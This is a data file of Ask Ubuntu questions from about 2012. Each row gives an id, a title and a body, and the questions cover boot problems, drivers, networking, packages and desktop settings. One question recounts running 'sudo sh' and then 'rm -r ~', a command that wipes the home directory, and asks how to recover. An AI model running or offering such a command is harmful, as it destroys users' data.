178308	uefi/gpt win 7 load failure in dual boot and no grub2 [ ubuntu 12.04 ]	configuration : mbb : asrock x79 extreme6 win 7 installed on a intel 40gb ssd ( gpt partitioned ) ubuntu 14.04 on a corsair 30gb ssd ( ext4 and swap ) i had windows 7 installed previously in uefi mode , using 3 partitions ( gpt ) and works fine if left alone . in uefi bios settings i can see sometimes a `` windows boot manager '' and other times ( ? ) a `` uefi intel '' entry for intel hdd and windows will boot properly selecting the one available at that time . i installed ubuntu 14.04 after win 7 w/o changing any uefi bios settings and it works fine only if the bios is set w/ the ubuntu partition as the first drive to boot , in ahci mode . if both ssd drives are connected , the win7 intel boot drive can be chosen as first boot device but only as an `` ahci intel drive '' ( no `` windows boot manager '' nor `` uefi intel device '' options available in bios boot menu ) and win7 will not load properly as long as the ubuntu crucial ssd is not physically disconnected . windows will try , start booting for few seconds but will fail replacing win7 logo and that startup animation with w/ the `` old '' white progress bar and then and will notify that there is a issue and prompt the user to try to load win 7 in normal mode again or try a recovery mode to fix it . if i let windows intel hdd boot via bios/uefi - windows boot manager selection , i may see the purple screen of grub2 loaded for a while , but there 's no selection for ubuntu or windows and/or then machine is not booting , showing a black screen and a small command prompt cursor blinking on top . so far the only option i see to have ubuntu boot side by side w/ win 7 is to reformat the win7 sdd and set it boot in legacy bios mode with a mbr instead of gpt . per my understanding this is a quite complex issue to fix ( rod smith 's answer was pretty helpful : uefi boot on my asus k52f ) but any other suggestions are welcome . i find a bit odd that i can boot properly windows7 ssd or an ubuntu dvd using a dvd drive set in uefi-bios in `` ahci mode '' and w/ using `` uefi/windows boot manager '' booting option but i can not boot a secondary ssd-hdd w/ ubuntu having the same bios/uefi boot configuration . looks like plugging the second ssd [ the ubuntu partition ] is interfering with boot options in uefi-bios .
178312	where does apt-get install libqt4 ?	i 've been searching for literally hours and i can not figure out where for the life of me libqt4 is installed by apt-get . i installed : libqt4-dev libqt4-core libqt4-gui libqt4-xml libqt4-opengl next , i installed qtcreator 2.5.2 with the binary install file downloaded from qt-project.org because the qtcreator available in the ubuntu repos is only 2.4 . qtcreator has to be able to find qt libraries and qmake on my system , but i ca n't even find them . does anyone know where the $ * ( ^ # $ ( & ^ # apt-get installs them ?
178313	what is the best filesystem for my needs in 12.04 ?	i 'm building nas for my personal use . 3-5 computers as load . mostly video streaming , upload download of big files 10gb or so ( 70 % of future load ) , photo editing ( 20 % ) , office stuff ( 10 % ) . i 'm expecting a big number of files/folders in some folders ( 1000-5000 ) . i also decided to use this nas as light duty workstation ( for emails , web , news watching ) since it will be 24/7 on . i decided to go with ubuntu 12.04 64-bit desktop version since server version does n't have gui . i 'm going to put at work adaptec raid 6805 controller and 24 sas expander . for start , i 'll use 8-3tb hdd in raid 6 ( system will be on separated 64g ssd ) with possible future raid expansion . what will be good filesystem to go with ? ext3 , ext4 , xfs or something different ? what gives me the most benefits for my needs ? what about reliability ? i read somewhere xfs is not as reliable as ext3 , is it myth or reality ? also , what size of blocks should i use on raid 6 controller ? please correct me in any statements i did above if wrong . did i make good choices ? i also wanted to mention nas will mostly work with computers running on windows os . any input , ideas will be appreciated .
178320	ubuntu and facilities for all kind of user	in charge of the disabled website http : //www.wheelchair.ch - http : //www.handiplus.ch , which is aimed to deliver information and promote integration for any kind of mobility impairment , and regular ubuntu user , i would like to see more `` accessibility '' in it ... why not introduce extra features for people with disability and let them have an accessible common os ? in that purpose , i suggest to include in a future ubuntu versions : - a vocal command to help the blinded - a one touch command or closer commands option for quadriplegics and other people suffering of lack of mobility so that then can use ubuntu easier without the complicated use of mouses for side to side on the screen - visual alerts rather sound alerts to satisfy deaf people ... . and much more facilities i thing ubuntu should be equally suitable to disabled than to `` enabled '' people . and for that matter , i am ready to bring any help i can , if necessary . best regards a.c .
178324	how to skip kernel update ?	i am running ubuntu 12.04.1 lts i686 on virtulbox . every time i check the updates , there 's a new linux kernel . if i install the new kernel , i have to install the virtulbox guest additions again and reboot the server . i do n't want to do this every week . i know i can manually uncheck the kernel packages from update manager , but is there a way to skip the kernel update automatically ? i found an answer here , but it 's for ubuntu 10 . thanks .
178334	avoid the yellow message at the top of the gnome-terminal window that states `` the child process exited normally with status 0 . ''	i have a gnome-terminal profile created with `` when the command exists : hold the terminal open '' set . how can i avoid the yellow message at the top of the gnome-terminal window that states `` the child process exited normally with status 0. '' ? below are the contents of the desktop entry i have pinned to the unity launcher . file name : twittertext.desktop [ desktop entry ] type=application terminal=false icon=vinagre name=text twitter timeline exec=/usr/bin/gnome-terminal -- window-with-profile=microblog -- hide-menubar -- command= '' /usr/bin/python /home/htplainf/twittertimeline.py ''
178335	why does it take so long for an app update to reach the ubuntu repositories ?	take libreoffice for example . version 3.6.0 has been out for quite some time now , but ubuntu users are still waiting for version 3.5.4.2 to update ( i 'm not the only one , right ? )
178337	why am i getting this error when trying to install wine 1.4 ?	can any one tell me what this error means ? i am trying to install wine 1.4 but it keeps failing with this error : the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.1.2ubuntu7 is to be installed depends : libc6 ( > = 2.11 ) but 2.15-0ubuntu10 is to be installed depends : libgettextpo0 but it is not going to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu1~precise1~ppa3 ) but 1.4.1-0ubuntu1~precise1~ppa3 is to be installed depends : binfmt-support ( > = 1.1.2 ) but it is not going to be installed
178340	how to make popup volume bar linear instead of pixely box ?	i used to have a nice sleek-looking linear popup volume slider bar like this : now i have a pixelly volume slider box whenever i change the volume on my keyboard : how do i change my pop-up volume bar back to what it used to be ?
178345	can i re-install my os without affecting my previous data ?	i have a dell server on which i have installed ubuntu server edition . i had it running with two arrays ( one raid 1 , the other a raid 5 ) . my system has gone bad due to me not using a power backup combined with a power-surge/power-outage ( not sure which ) . the hardware is fine , my arrays are healthy , and ram has been tested , therefore i believe it is a software problem . i am not sure whether to re-install vs. try repairing my system . i have tried to repair , however my knowledge of shell commands and usage is extremely limited ( to give you an idea , i was able to set up my server utilizing the shell however this is all i could manage ) . i think it would be easier to simply re-install , however whenever i try to re-install it prompts me to format my raid 5 array ( which has my data ) . any ideas/tips/anything would be very much appreciated !
178350	/var/www owned by my user , cant send files to trash	i changed ownership of /var/www to username : username since im using it only for development but when i try to delete something it wont send the files to the trash but asks me to permanently delete them .
178352	broadcom 4365 wireless driver with 3.4 / 3.5 kernel	i used this package to install the driver on 3.2 kernel and it was working perfectly . unfortunately the system used to freeze randomly with 3.2 kernel so i installed 3.4 kernel , now there is no freezing , the only problem is that my wifi card is not working , i tried to re-install the package , but did n't work . i can see the driver in the `` additional drivers '' and it say that it is active , but when i execute iwconfig it does n't show up . i 've even tried ndiswraper and that did n't work either . my lspci : 01:00.0 network controller : broadcom corporation device 4365 ( rev 01 )
178354	12.04 wholly dark ambiance theme ?	i got my first partition of ubuntu recently , and wanted to match it to a 10 or 11 interface i was using on another computer . it looked like this : themes in 12.04 seem to be rather tricky though . i 've delved into usr/share/themes and ~/ . themes countless times with gtk-2 and gtk-3 trying to get things working , using appearance and advanced settings ( from a `` tweak '' something or other ) . nothing has worked though , and the themes i 've found so far are ugly to boot . all i 'm looking for is straight up ambiance with dark backgrounds for everything but that seems out of reach . any advice ?
178355	how do i set profile picture on lubuntu ?	i 'm using lubuntu on my netbook and i want to change the lightdm greeter so i set the lightdm-webkit-greeter , but my user does n't have a profile picture . how i can set my profile picture ? . i have searched on system > users and groups but i ca n't find any option for this task .
178356	tracing ir to hauppage remote on mythbuntu 12.04	i have installed mythbuntu 12.04 on an amd dual core . basic tv play and record functions are working , but i am having some troubles with the remote . the card is a hauppauge wintv-hvr 1250 . i have looked at how do you get the remote to work on my hauppage tv card ? . in the mythbuntu control centre , i went the infrared and changed the remote to hauppage hvr-1100 . it did n't seem to work , so i tried regular stuff like checking the voltage on the batteries ( 1.5v ) and making sure the ir cable was plugged in the right place . i stopped lirc with sudo service lirc stop . it failed because it could not find /sys/class/rc/*/ . i tried ls /dev/l* but there was no lirc0 or lirc1 . i ran cat /proc/bus/input/devices to find input devices , but nothing in the list looks like an ir-receiver . i looked at /etc/lirc/hardware.conf . here are some of the important lines : remote= '' hauppauge hvr-1100 '' remote_device= '' /dev/lirc0 '' remote_lircd_conf= '' hauppauge/lircd.conf/hauppauge '' i tried pressing several keys on the hauppauge remote and then looking at the tail of /var/log/kern.log , but no keystrokes seem to be coming through . can you help me trace the ir signal ? i do n't actually have confidence that anything is coming through .
178360	ubuntu software center download seems to have stopped	i 'm new to ubuntu and i was trying to download skype when it just stopped with the bar roughly around 25 % and when i go to progress it says `` skype '' then `` applying changes '' below it , and the bar all the way at the end about 25 % orange .
178364	i am trying to build libmtp 1.1.14 but i can not fix this error	i have run this in a terminal . git clone git : //libmtp.git.sourceforge.net/gitroot/libmtp/libmtp cd libmtp ./autogen.sh ( answering yes to all questions ) but when i try to run the ./configure -- prefix=/usr/ i get this error : checking whether to build static libraries ... yes ./configure : line 11739 : ac_lib_prepare_prefix : command not found ./configure : line 11740 : ac_lib_rpath : command not found ./configure : line 11745 : syntax error near unexpected token `iconv' ./configure : line 11745 : ` ac_lib_linkflags_body ( iconv ) ' i have built and installed the libiconv from here . i do not know what to do , been trying for a few hours but i am pretty noob to linux . how can i fix this ? the lines 11739 to 11745 in the configure file looks like this : ac_lib_prepare_prefix ac_lib_rpath ac_lib_linkflags_body ( iconv )
178371	install ubuntu 12.04 from pen drive , now will not boot	i installed ubuntu 12.04 desktop amd64 to the following : amd a8 3870k ( cpu + gpu ) asus f1aff-m lx plus motherboard g skill 16gb ram ( 1333 ) ocz agt3-25sat3-120g 120gb ssd ( os hdd ) wd red nas 1tb hdd ( storage ) wd red nas 2tb hdd ( storage ) wd red nas 2tb hdd ( storage ) 450 watt power supply this is a clean install , no previous os ubuntu booted from the flash dive without a problem , and installed to my ssd , i am using this as the os hdd and told it to install there , no partition . install went fine , put my user name , comp name etc . in , and then when it asked to restart , it restarted and then nothing came on the screen . my monitor told me no signal , and that was all . i was thinking maybe a power problem , so i disconnected all of 2 of hdd ( left the 1tb and the os ) , and still nothing is booting . i just to this purple screen that is a box to the left of center , and nothing not even a command prompt . is there something i did wrong ? how do i reinstall , as it is not letting me do that , or is my power supply not good enough , or is the a8 chipset not compatible with ubuntu ?
178372	how do i revert to a previous version of iwlwifi ?	the current version of iwlwifi that i got with ubuntu updates is not letting me connect to wep networks . it keeps on getting timed out or deauthenticated .
178373	mouse clicks when i release the button	in ubuntu 12.04 , my mouse clicks when i release the button . what happens ( bad ) : i right click ( mousedown ) , the context menu appears , when i release the mouse button ( mouseup ) , the item under the cursor is clicked . what should happen ( good ) : i right click ( mousedown ) , the context menu appears , nothing happens when i release the button . to click an item in the context menu , i click it normally with the right mouse button . i have experienced this behavior in chrome , the file browser , and in gnome terminal . the mouse is a razer deathadder ( but i 'm just running whatever drivers ubuntu picked automatically ) , and if it matters , i 'm using the amd/ati graphics drivers .
178374	customizing 12.04 from terminal	i recently read a blog post on customizing ubuntu 9.04 ( i believe ) via the terminal . it explained how to download all the linux base packages and create a linux distro inside of a directory and then how to chroot that directory . somewhere along the line i could n't get a package to install that the tutorial needed so i had to drop the project altogether . i would like to continue with developing a distro but i ca n't seem to find the tutorial again and i 've just purchased a brand new computer with all my files from my old one gone . how would i go about downloading the base linux files into a folder , chrooting that folder to install a few other programs , and then automatically starting a python script upon system boot ( once the user has installed the system ) . thanks for all answers .
178376	why is it every time i try to download something its says error	i tried to download itunes , and it worked far as loading but when i clicked on it , it said `` an error while loading this archive '' . and it always says that everytime i try to download something .
178383	dpkg error when trying to uninstall java	i have been trying to uninstall jre6 but i keep getting the error dpkg : warning : there 's no installed package matching sun-java6-jre : amd64 i 've tried sudo apt-get -- purge remove sun-java6\* vim and sudo apt-get purge sun-java6-\* i just want to remove it so i can install jdk7 .
178386	unable to install 10.04 after removing 12.04	my laptop was dual booting windows xp and ubuntu 10.04 . recently i completely formatted my 250 gb hdd and installed windows xp in a 5gb partition . then installed ubuntu 12.04 in remaining space . but wifi is found to be slow in 12.04 , so i decided to revert back to 10.04 . i removed the ubuntu partition from windows and tried to install 10.04 . but after 44 % it shows an error message that copying is not possible ... . i thought it may be the problem of installation disk . so again tried to install 10.04 from a usb . but it also shows the same error . when i restarted , it shows booting error that grub was not found . as i am not an expert in ubuntu , i tried to re-install windows xp . then it shows the error can not format disk . so now i am not able to install ubuntu 10.04 nor windows xp in my laptop . then i again tried to install 12.04 and it worked . how can i revert this 12.04 to 10.04 and install windows xp ?
178387	how do i set up internet connection on ubuntu 11.10 ?	i installed ubuntu 11.10 today . i had installed ubuntu many a times and uninstalled it again because i could n't connect to the internet . i tried configuring the dsl in ubuntu , but it failed . i configured wired connections and it got connected . then when i connect to dsl , the wired connection gets disconnected . its very confusing as in : what is wired connection and what is dsl ? my windows network setting looks like the one in the image . please someone help me in configuring it in ubuntu . this is the dialler setting which i use to connect to the net . this is my lan setting . this is the output of ifconfig rakz @ ubuntu : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 00 : e0:4d : c2:30:7e broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:41 base address:0xa000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:64 errors:0 dropped:0 overruns:0 frame:0 tx packets:64 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5120 ( 5.1 kb ) tx bytes:5120 ( 5.1 kb ) this is the output of cat /etc/network/interfaces auto lo iface lo inet loopback iface dsl-provider inet ppp pre-up /sbin/ifconfig eth0 up # line maintained by pppoeconf provider dsl-provider auto eth0 iface eth0 inet manual
178391	how to run a python script for a specific user log in ?	i have written a python script and would like that to run for a specific user log in . the script has two images , one with the windows logo and the other for linux . when the windows logo is clicked it runs the rdesktop program and logs into the windows box . i have been looking for an example or help for the linux image when clicked loads the ubuntu desktop for that user . also where and how to run this script for a specific user ? and if i can get this script to run on login for this user , will the image buttons be the only thing displayed until one of them is clicked ?
178393	how to prevent unity launcher appearing when using browser back button ?	try to use the back button on your browser and ever time you go up there launcher pops out and you have a battle to win against launcher so you can use your browser back button . for example can the launcher be moved to anywhere but the left side of the screen ?
178401	what 's the difference between ubuntu for free and the official cd for $ 5 ?	what 's the difference between ubuntu 12.04 lts for free and the official cd of ubuntu for $ 5 ? i did n't know the difference .
178409	copying the launcher image into a file	how would i copy the launcher image , or any application window , so that i can paste it into an image application that saves to a file that can be inserted into an askubuntu.com question ? which image application is available on a default installation of 12.04 ?
178410	unable to run tor browser bundle , not even in terminal	i am a linux newbie , and this is the first time i am using tor in 12.04 . i have an issue in running tor for which i could n't find any specific answer in the internet . so let me explain . i downloaded tor browser bundle ( tor-browser-gnu-linux-x86_64-2.2.38-1-dev-en-us.tar.gz ) and saved to this location : /media/50b8245bb82441b8/tor/ i then extracted tar.gz file into the same directory . so now i have /media/50b8245bb82441b8/tor/tor-browser_en-us in this directory , there is a file start-tor-browser . the problem is that , when i double click this file , it opens in text format , instead of launching tor vidalia . so i right-clicked this file > permissions > checked allow executing file as program , but again it automatically unchecks it . i then thought of executing this file through the terminal , but nothing seems to work . cd /media/50b8245bb82441b8/tor/tor-browser_en-us jerry @ ubuntu : /media/50b8245bb82441b8/tor/tor-browser_en-us $ jerry @ ubuntu : /media/50b8245bb82441b8/tor/tor-browser_en-us $ start-tor-browser start-tor-browser : command not found jerry @ ubuntu : /media/50b8245bb82441b8/tor/tor-browser_en-us $ cd start-tor-browser bash : cd : start-tor-browser : not a directory jerry @ ubuntu : /media/50b8245bb82441b8/tor/tor-browser_en-us $ sudo start-tor-browser [ sudo ] password for jerry : sudo : start-tor-browser : command not found jerry @ ubuntu : /media/50b8245bb82441b8/tor/tor-browser_en-us $ gksu start-tor-browser jerry @ ubuntu : /media/50b8245bb82441b8/tor/tor-browser_en-us $ as you can see , when i use gksu , nothing really happens except an empty command line added with a blinking cursor . can someone please help ?
178414	option to activate help text	is there any help text option in ubuntu ? by this i mean as we see in windows if u hover the cursor over files u get basic details of the file in a small text box near the cursor . is there any such option in ubuntu ?
178416	play folder content in audacious on right click in thunar	i would like to add a custom action in thunar , playing a content of a folder in audacious . how can i do that ?
178422	how much memory does ubuntu need ?	how much memory do i need for ubuntu ? i mean everything that is taking memory space after i finished installing it .
178423	how to cd to where i extracted a package , and run dpkg-deb -d ?	i am following the step-by-step instructions on how to install thinkpad fan control here but i could not get past this step ( seen below ) : open a terminal and run this command : code : dpkg-deb -d -- build tpfan admin_0.96-ubuntu1_all instead i get this message when i enter it in the terminal : dpkg-deb : error : failed to open package info file `tpfan/debian/control ' for reading : no such file or directory the .deb file is in my downloads folder so i tried cd ./downloads dpkg-deb -d -- build tpfan admin_0.96-ubuntu1_all but i get juno @ oogushi : ~/downloads $ . how can i run the command properly ? i 'm not familiar with the terminal and commands so i do n't know how to do this properly . i am using thinkpad r61i 12.04 64-bit .
178425	why is there a reserved spot in the launcher ?	why is there a spot reserved for a launcher icon ? see the arrow in the image , please . is this a missing icon ? hovering reveals nothing . hover-right-click provides an unlock-from-launcher option . edit : i was requested to click it . nothing happens upon a click . well at least i do n't have much evidence that anything happened when i clicked it . i hope it does n't launch nuclear missiles .
178436	missing odbcconfig for sqlite and libreoffice base	i have used openoffice base as a front end for sqlite databases , in 10.04 linked via odbc . i am updating to 12.04 , so i loaded libreoffice base , looks just like oobase . i have 12.04 on one drive and 10.04 on another . i loaded sqliteman , sqlite3 , unixodbc-bin , unixodbc , libsqliteodbc , sqlitebrowser . i copied my databases directory over . but in terminal odbcconfig is not on the 12.04 system . so i copied odbc.ini from the home directory on 10.04 to 12.04 home directory , and now libreoffice base can access my database , and all is fine . anyone know what is the problem with odbcconfig , is it another victim of the change in qt ? of course i could edit odbc.ini with jedit , now i can see the format . in terminal i tried sudo find / -name odbcconfig , but its not there .
178437	how can i avoid `` please insert cd/dvd '' error when updating ubuntu ?	i ca n't update 12.04 lts . the update manager shows this : cd/dvd 'ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ' is required please insert the above cd/dvd into the drive '/media/cdrom/ ' to install software packages from it . the image i downloaded and burned to cd is from http : //releases.ubuntu.com/12.04/ the pc ( intel x86 ) desktop cd version . i burned many cds but the result is the same .
178440	accidental deletion of home	i by mistake excecuted this command : sudo sh and then : rm -r ~ i closed the terminal but still many files are gone and they are not in trash . i have n't executed any command since then so can i some how revert my previous command ? someone , please help !
178445	setting up anacron for version control update	i store some of my configuration files in version control . recently i tried to setup a daily anacron job so that i wo n't have to manually update the files . i have never used cron or anacron before but reading through cron documentation i decided to put my script in /etc/cron.daily . below is my script named dot-files ( changed to executable with chmod +x ) : # ! /bin/sh cd /home/dell/dot-files & & /usr/bin/git add . & & /usr/bin/git commit -a -m 'daily update ' & & /usr/bin/git push -u origin master however it does n't seem to be running for the last two days . here are the lines from /var/log/syslog : aug 21 10:42:02 dell-studio-1535 anacron [ 1023 ] : job `cron.daily ' terminated ( exit status : 1 ) ( mailing output ) aug 21 10:42:02 dell-studio-1535 anacron [ 1023 ] : ca n't find sendmail at /usr/sbin/sendmail , not mailing output can anyone see what 's wrong with that ? also am i using a wrong setup for the purpose ? p.s . i 'm using an ubuntu 12.04 system and it 's not always running .
178447	ubuntu 12.04 lts on pendrive	i 've got a problem with installing ubuntu on pendrive . steps i made : downloaded iso from ubuntu site . burn it on dvd . run pc from the dvd ( pendrive is plugged in ) . followed instruction on the screen . during partitioning phrase select sdb ( pendrive ) , create partition , select mountpoint to / and install grub on sdb . wait for installation to complete . reboot pc , and remove dvd from drive . now my pc displays information : no operating system were found , and then my windows is starting up normally . pendrive is of course plugged in and boot order is set to : dvd pendrive network hdd any suggestions ? ps : pendrive : a-data s102 32gb usb3.0
178449	terminal stops every time a yes/no question appears	i have encountered a problem when using the terminal to install programs . whenever a yes/no option like the one below appears , not just with this program , but with any i try , the terminal stops after i have selected yes and will do nothing . i have even left it on for 3 hours just in case it was going slow , but to no avail . so my question is , what do i do to fix this or get around it ?
178450	can not change icon for a filetype	i am trying to change the icon for .py file . i referred : http : //askubuntu.com/a/78645/78407 http : //askubuntu.com/a/56725/78407 and https : //help.ubuntu.com/community/addingmimetypes still no success in changing the icon of python scripts . they remain like gedit icons .
178451	low quality window switcher icons in gnome 3	i 'm using gnome 3 with ubuntu . i 've manually replaced a few low resolution icons in the application menus . however , when switching between programs , some of the icons are still of low quality . here 's a screenshot . emacs , terminal and chrome are fine , matlab apps are not , even though the matlab launcher is fine . i 'm not sure if this is related to the same problem in unity . also , i 'm not sure if it 's specific to those applications . if there 's a way of fixing the icons manually ( as i 've been doing for the launchers ) , i 'd accept that as an answer . i 've been trawling the internet to try to resolve this but i really have n't come up with anything . help appreciated and apologies if it 's not ubuntu-specific and thus off-topic .
178457	grep bash alias	i try to write grep alias exclude log files alias gr='grep -r -- exclude=\* . { log,0,1,2 , js } `` $ 1 '' *' alias gr='grep -r -- exclude=\* . { log,0,1,2 , js } $ 1 *' does n't work correct i need to make something like gr `` sometext ''
178461	difference between live session and full installation .	when i boot a computer from a ubuntu disc and choose an option to try ubuntu . how exactly live session runs ? is it a full running instance of ubuntu os or some sort of visual interface on top of windows ? in short , what is the difference between ubuntu which was booted from cd or usb disk and fully installed version of ubuntu os ?
178464	'vnstat ' works , 'vnstat -l ' does n't	i have just installed vnstat . i run vnstat and get this : ~ $ vnstat rx / tx / total / estimated wlan0 : aug '12 12.89 mib / 14.14 mib / 27.03 mib / 37.00 mib today 12.89 mib / 14.14 mib / 27.03 mib / 29 mib irda0 : not enough data available yet . eth0 : not enough data available yet . i 'm only using wireless , and i 've only just installed it , so i would expect that . however , when i run vnstat -l , it only returns stuff for eth0 ; wlan0 is n't present : ~ $ vnstat -l monitoring eth0 ... ( press ctrl-c to stop ) rx : 0 kbit/s 0 p/s tx : 0 kbit/s 0 p/s^c similarly when i run vnstat -h ( show traffic for last 24 hours ) , or any one of a number of other commands , it only complains about not having enough data for eth0 , and does n't try to return anything for wlan0 . what 's going on ?
178467	thinkpad fan control error	i was able to install tpfand and tpfan-admin by following the instructions posted here . however , i 'm unable to finish all the instructions . after installing thinkpad fan control i referred to the instructions again and did this : now in the terminal again : code : sudo gedit /usr/lib/python2.6/dist-packages/tpfand/settings.py a text file ( gedit ) opens up but the file is blank so i ca n't continue to the next step which is : find the lines 170-174 and replace : code : self.product_id = none self.product_name = none self.product_pretty_vendor = none self.product_pretty_name = none self.product_pretty_id = none in addition , when i click on thinkpad fan control this message appears despite being able to install tpfand : also , when i try sudo thinkfan i get this message : warning : using default temperature inputs in /proc/acpi/ibm/thermal . warning : you have not provided any correction values for any sensor , and your fan will only start at 55 째c . this can be dangerous for your hard drive . config as read from /etc/thinkfan.conf : fan level low high 0 0 55 1 48 60 2 50 61 3 52 63 4 56 65 5 59 66 7 63 32767 daemon pid : 3367 juno @ oogushi : ~ $ i found this post on how to control thinkpad fan speed for t430 , but i got confused on steps 6 and 7 so i aborted my experiment to do it . is there a way to solve this ? i hope someone can help me . i 'm using thinkpad r61i 12.04 64-bit , intel t5870 4gb ram , 160 gb hdd .
178471	ca n't talk out to the internet , but can connect in and resolve ip addresses	basically this is whats going on , i have an external ssh connection into a system running ubuntu 12.04 desktop . however i have no external connection from that pc to the internet , to run apt-get or ping . i can however resolve ip addresses , the ping command will correctly return the ip addresses of target hostnames . from what their network guys tell me there should n't be anything on the router or server that stopping this pc from connecting out . my understanding of how their network is setup is that the server handles the firewall , dns and internet connection , while the router is used for internal routing , the server is on ip address 192.168.0.1 and the router is on 192.168.0.254 , with the pc being 192.168.0.19 . i 've tried doing a traceroute , after manually installing it , and it does n't appear to get anywhere , not even to the local network first , which does reply to pings . ifconfig eth0 link encap : ethernet hwaddr 54:04 : a6:02:04:20 inet addr:192.168.0.19 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :5604 : a6ff : fe02:420/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:10061 errors:0 dropped:0 overruns:0 frame:0 tx packets:7793 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1564415 ( 1.5 mb ) tx bytes:1254821 ( 1.2 mb ) interrupt:46 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:40916 errors:0 dropped:0 overruns:0 frame:0 tx packets:40916 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4393568 ( 4.3 mb ) tx bytes:4393568 ( 4.3 mb ) route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.254 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 traceroute to my ip address traceroute to ... ( ... ) , 30 hops max , 60 byte packets 1 * * * 2 * * * 3 * * * 4 * * * 5 * * * 6 * * * 7 * * * 8 * * * 9 * * * 10 * * * 11 * * * 12 * * * 13 * * * 14 * * * 15 * * * 16 * * * 17 * * * 18 * * * 19 * * * 20 * * * 21 * * * 22 * * * 23 * * * 24 * * * 25 * * * 26 * * * 27 * * * 28 * * * 29 * * * 30 * * * external traceroute to pc traceroute to ... ( ... ) , 30 hops max , 60 byte packets 1 dsldevice.lan ( 192.168.1.254 ) 16.894 ms 16.555 ms 16.287 ms 2 lo0-central10.pcl-ag05.plus.net ( 195.166.128.186 ) 17.580 ms 18.230 ms 24.675 ms 3 link8-central10.pcl-gw02.plus.net ( 84.93.249.142 ) 32.715 ms 33.488 ms 34.399 ms 4 xe-8-2-0.pcl-cr02.plus.net ( 212.159.1.10 ) 34.976 ms 35.439 ms 35.909 ms 5 ae1.ptw-cr02.plus.net ( 195.166.129.2 ) 36.818 ms 38.005 ms 39.118 ms 6 ae2.ptw-cr01.plus.net ( 195.166.129.4 ) 39.596 ms 29.893 ms 30.118 ms 7 xe-0-1-1.jprg-01.thn.uk.mdnx.net ( 195.66.224.33 ) 25.884 ms 16.471 ms 17.008 ms 8 xe-0-0-1.jar-004.thn.uk.mdnx.net ( 135.196.65.114 ) 15.459 ms 16.204 ms 17.875 ms 9 ge-6-0-0.core-02.tlh.uk.mdnx.net ( 135.196.69.94 ) 19.085 ms 19.727 ms 20.382 ms 10 gi4-0-105.resellers.erx-001.egh.uk.mdnx.net ( 135.196.154.46 ) 22.704 ms 23.290 ms 24.031 ms 11 92.54.178.213 ( 92.54.178.213 ) 41.196 ms 42.174 ms 33.699 ms 12 * * * 13 * * * 14 * * * 15 * * * 16 * * * 17 * * * 18 * * * 19 * * * 20 * * * 21 * * * 22 * * * 23 * * * 24 * * * 25 * * * 26 * * * 27 * * * 28 * * * 29 * * * 30 * * * /etc/network/interfaces auto lo iface lo inet loopback /etc/hosts 127.0.0.1 localhost 127.0.1.1 tm-scada 192.168.0.19 tm-scada # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters /etc/resolv.conf nameserver 192.168.0.1 nameserver 127.0.0.1 search sbserver.welland.local any ideas , or anything i 've overlooked ?
178474	12.04 compiz does not properly work since upgrade	a few days ago , i updated the kernel to 3.2.0-29-generic-pae . since then , all compiz effects have disappeared ( all such as wobbly windows , windows switcher , workspace changing effects ... ) . the unity -- reset or compiz -- replace commands do n't help as all the windows ' edges/buttons vanish , the desktop background becomes black . after rebooting , i am back to a working interface , but without compiz effect . i have tried the following solutions which have no effect on my desktop : changed some settings in compiz - now ubuntu freezes on startup how do i reset my unity configuration ? do you have any ideas on how i can fix this problem ? help will be appreciated !
178479	how to create a wifi hotspot in ubuntu server ?	i have to network interfaces , eth1 and wlan0 . eth1 is connected to the internet . i need wlan0 to serve as a hotspot sharing eth1 's internet connection to anyone connected to wlan0 . i am running ubuntu server 12.04 lts . any help will be greatly appreciated .
178481	how to download an mp3 track from a youtube video	there are several q & a threads that explain how to download youtube videos using the terminal . however , i would also like to learn how to extract the video 's soundtracks as mp3 files -- also using only the terminal . answers briefly explaining how to use youtube-dl or other similar utilities before explaining how to extract the mp3 would be ideal for the sake of having all the information in one place -- even though this aspect has been covered in other posts .
178486	how do i fix `` icdauthority '' error on login ?	when i go to log in this error code appears : could not update icdauthority file /home/james/.iceauthority i have tried using chown james : james /home/james/.iceauthority followed by chmod 644 /home/james/.iceauthority in the root menu , but this was unsuccessful .
178490	high cpu load in chrome with moonlight plugin on ubuntu	i am using lubuntu 12.04 64bit , stable chrome and moonlight plugin . the problem is when i try to load this page : http : //ms01.oe3.fm/oe3metafiles/player/player.html - it is online radio player for silverlight . it is probably poorly written , because when the tab with player is focused , cpu load is around 30 % . when i focus another tab , cpu load goes down to 1-2 % , which is acceptable and music is still playing of course . however in lubuntu , cpu load is 100 % when the tab with player is focused , but it does n't change when i focus different tab . is there anything i can do to listen to this radio and have decent cpu load ? it 's funny , but this simple problem keeps me tied to windows and i ca n't switch to linux because of it : - ( thanks for any help and hints in advance .
178491	nice command without root privileges	i need to run dosemu with nice -- 20 from script . problem is : a negative value can be applied only with sudo . do you know any way to run nice command without sudo or simply run nice -- 20 dosemu from script ?
